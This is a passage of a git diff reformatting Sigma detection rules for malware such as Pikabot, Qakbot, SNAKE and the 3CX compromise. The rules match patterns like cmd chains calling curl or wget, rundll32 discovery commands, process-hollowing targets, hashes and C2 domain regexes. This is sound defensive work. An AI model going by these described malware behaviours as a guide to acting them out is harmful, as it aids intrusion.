https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt @@ -33,21 +25,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - cmd - /c selection_pipes: - CommandLine|contains: + CommandLine|contains: - ' & ' - ' || ' selection_commands_1: - CommandLine|contains: + CommandLine|contains: - ' curl' - ' wget' - ' timeout ' - ' ping ' selection_commands_2: - CommandLine|contains: + CommandLine|contains: - ' rundll32' - ' mkdir ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml index 8cb1b5b3e..fa0d2a095 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml @@ -1,13 +1,9 @@ title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE id: 698d4431-514f-4c82-af4d-cf573872a9f5 status: experimental -description: 'Detects the execution of rundll32 that leads to system discovery activity, - such as incl. network, user info and domain groups. - - The malware Pikabot has been seen to use this technique as part of its C2-botnet - registration with a short collection time frame (less than 1 minute). - - ' +description: | + Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups. + The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). references: - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242 author: Andreas Braathen (mnemonic.io) @@ -22,16 +18,15 @@ tags: logsource: product: windows category: process_creation - definition: 'Requirements: By default the process_creation type event might not - contain the GrandParentImage. Make sure you collect such fields in order to - use this rule' + definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule' detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: GrandParentImage|endswith: \rundll32.exe - CommandLine: + CommandLine: + # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware - ipconfig.exe /all - netstat.exe -aon - whoami.exe /all diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml index e43f24ac5..1c4470c16 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml @@ -1,13 +1,9 @@ title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE id: d8937fe7-42d5-4b4d-8178-e089c908f63f status: experimental -description: 'Detects the execution of rundll32 that leads to the invocation of legitimate - Windows binaries. - - The malware Pikabot has been seen to use this technique for process hollowing - through hard-coded Windows binaries - - ' +description: | + Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. + The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries references: - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62 author: Andreas Braathen (mnemonic.io) @@ -27,6 +23,7 @@ detection: selection: ParentImage|endswith: \rundll32.exe Image|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml index 0a3d52c10..e9e778b04 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml @@ -1,9 +1,7 @@ title: Qakbot Regsvr32 Calc Pattern id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9 status: experimental -description: Detects a specific command line of "regsvr32" where the "calc" keyword - is used in conjunction with the "/s" flag. This behavior is often seen used by - Qakbot +description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot references: - https://github.com/pr0xylife/Qakbot/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - ' /s' - ' -s' - CommandLine|endswith: ' calc' + CommandLine|endswith: ' calc' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml index 876ed7144..d69887891 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Rundll32 Execution id: cf879ffb-793a-4753-9a14-bc8f37cc90df status: experimental -description: Detects specific process tree behavior of a "rundll32" execution often - linked with potential Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_paths: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -29,13 +29,14 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ selection_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml index 56ab42047..d10847dff 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml @@ -1,8 +1,7 @@ title: Qakbot Rundll32 Exports Execution id: 339ed3d6-5490-46d0-96a7-8abe33078f58 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution with - exports linked with Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) @@ -22,6 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_paths: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -30,14 +30,16 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ selection_exports: - CommandLine|endswith: - - aslr + CommandLine|endswith: + # Note: Only add additional exports seen used by Qakbot + - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report - bind - DrawThemeIcon - GG10 @@ -47,7 +49,7 @@ detection: - LS88 - Motd - N115 - - next + - next # https://tria.ge/230530-n3rxpahf9w/behavioral2 - Nikn - print - qqqb diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml index 8f709f058..eefac0361 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml @@ -1,9 +1,7 @@ title: Qakbot Rundll32 Fake DLL Extension Execution id: bfd34392-c591-4009-b938-9fd985a28b85 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution where - the DLL doesn't have the ".dll" extension. This is often linked with potential - Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -22,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -30,13 +29,14 @@ detection: - \pwsh.exe - \wscript.exe Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ filter_main_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml index 6887b2aaf..d3de5f741 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml @@ -1,8 +1,7 @@ title: Qakbot Uninstaller Execution id: bc309b7a-3c29-4937-a4a3-e232473f9168 status: experimental -description: Detects the execution of the Qakbot uninstaller file mentioned in the - USAO-CDCA document on the disruption of the Qakbot malware and botnet +description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet references: - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community @@ -22,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \QbotUninstall.exe - - Hashes|contains: - - IMPHASH=E772C815072311D6FB8C3390743E6BE5 - - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 - - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 - - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 - - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 + - Image|endswith: \QbotUninstall.exe + - Hashes|contains: + - IMPHASH=E772C815072311D6FB8C3390743E6BE5 + - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180 + - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6 + - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071 + - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml index 0ea26ecda..61985a141 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml @@ -1,9 +1,7 @@ title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5 status: test -description: Detects the use of Rundll32 to launch an NSIS module that serves as the - main stealer capability of Rhadamanthys infostealer, as observed in reports and - samples in early 2023 +description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 references: - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ @@ -25,12 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_rundll32: - - OriginalFileName: RUNDLL32.EXE - - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe selection_dll: - CommandLine|contains: nsis_uns + CommandLine|contains: nsis_uns selection_export_function: - CommandLine|contains: PrintUIEntry + CommandLine|contains: PrintUIEntry condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml index 8aca1a8e6..0eeb24050 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml @@ -29,7 +29,7 @@ detection: - \netsh.exe - \wevtutil.exe - \vssadmin.exe - CommandLine|contains: '11111111' + CommandLine|contains: '11111111' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml index 02b0e2d65..7ca36776e 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_installers_ioc.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Installer Name Indicators id: 99eccc2b-7182-442f-8806-b76cc36d866b status: experimental -description: Detects filename indicators associated with the SNAKE malware as reported - by CISA in their report +description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,6 @@ detection: - \jpinst.exe condition: file_event and selection falsepositives: - - Some legitimate software was also seen using these names. Apply additional filters - and use this rule as a hunting basis. + - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis. level: low ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml index 9c42b6845..b10cef088 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/file_event_win_malware_snake_werfault_creation.yml @@ -1,8 +1,7 @@ title: SNAKE Malware WerFault Persistence File Creation id: 64827580-e4c3-4c64-97eb-c72325d45399 status: experimental -description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory - by a non-system process, which can be indicative of potential SNAKE malware activity +description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml index 12bc29e3d..25be10efc 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation CLI Arguments Indicator id: 02cbc035-b390-49fe-a9ff-3bb402c826db status: experimental -description: Detects a specific command line arguments sequence seen used by SNAKE - malware during its installation as described by CISA in their report +description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} + # This CLI regex is based on the following description from the report: + # The jpsetup.exe installer requires two arguments to be passed via the command line for execution + # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256 + # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters) + CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16} condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml index eca3580a4..dada977d9 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml @@ -1,8 +1,7 @@ title: Potential SNAKE Malware Installation Binary Indicator id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733 status: experimental -description: Detects a specific binary name seen used by SNAKE malware during its - installation as described by CISA in their report +description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -23,15 +22,15 @@ detection: - \jpsetup.exe - \jpinst.exe filter_main_cli_name: - CommandLine: + CommandLine: - jpinst.exe - jpinst - jpsetup.exe - jpsetup filter_main_cli_empty: - CommandLine: '' + CommandLine: '' filter_main_cli_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml index adfb954ce..eb615e8c3 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml @@ -1,9 +1,7 @@ title: Potential SNAKE Malware Persistence Service Execution id: f7536642-4a08-4dd9-b6d5-c3286d8975ed status: experimental -description: Detects a specific child/parent process relationship indicative of a - "WerFault" process running from the "WinSxS" as a service. This could be indicative - of potential SNAKE malware activity as reported by CISA. +description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml index 72befe206..d5c84ed95 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Covert Store Registry Key id: d0fa35db-0e92-400e-aa16-d32ae2521618 status: experimental -description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' - which is a key related to SNAKE malware as described by CISA +description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml index 13e93cc8a..0ec62d97f 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml @@ -1,9 +1,7 @@ title: Potential Encrypted Registry Blob Related To SNAKE Malware id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b status: experimental -description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" - key with an uncommon name. This could be related to SNAKE Malware as reported - by CISA +description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -23,11 +21,10 @@ detection: selection: TargetObject|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\ filter_main_wav: - - TargetObject|endswith: .AssocFile.WAV - - TargetObject|contains: .wav. + - TargetObject|endswith: .AssocFile.WAV + - TargetObject|contains: .wav. condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Some additional tuning might be required to tune out legitimate processes that - write to this key by default + - Some additional tuning might be required to tune out legitimate processes that write to this key by default level: medium ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml b/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml index 11ec42887..ad29cd091 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/dns_query_win_malware_socgholish_second_stage_c2.yml @@ -1,9 +1,7 @@ title: Potential SocGholish Second Stage C2 DNS Query id: 70761fe8-6aa2-4f80-98c1-a57049c08e66 status: test -description: Detects a DNS query initiated from a "wscript" process for domains matching - a specific pattern that was seen being used by SocGholish for its Command and - Control traffic +description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic references: - https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations - https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations @@ -27,7 +25,6 @@ detection: QueryName|re: '[a-f0-9]{4,8}\.(?:[a-z0-9\-]+\.){2}[a-z0-9\-]+' condition: dns_query and selection falsepositives: - - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers - dc01.company.co.uk) + - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk) level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml index 774d7219e..b15fe50c4 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/dns_query_win_malware_3cx_compromise.yml @@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Beaconing Activity - DNS id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp - compromise +description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml index c762380e3..98efc271f 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/image_load_malware_3cx_compromise_susp_dll.yml @@ -1,23 +1,22 @@ title: Malicious DLL Load By Compromised 3CXDesktopApp id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar status: experimental -description: Detects DLL load activity of known compromised DLLs used in by the compromised - 3CXDesktopApp +description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Nasreddine Bencherchali (Nextron Systems) @@ -35,34 +34,38 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_hashes_1: Hashes|contains: + # ffmpeg.dll - SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 - SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429 - MD5=74BC2D0B6680FAA1A5A76B27E5479CBC + # d3dcompiler_47.dll - SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 - SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E - MD5=82187AD3F0C6C225E2FBA0C867280CC9 + # Inner object from 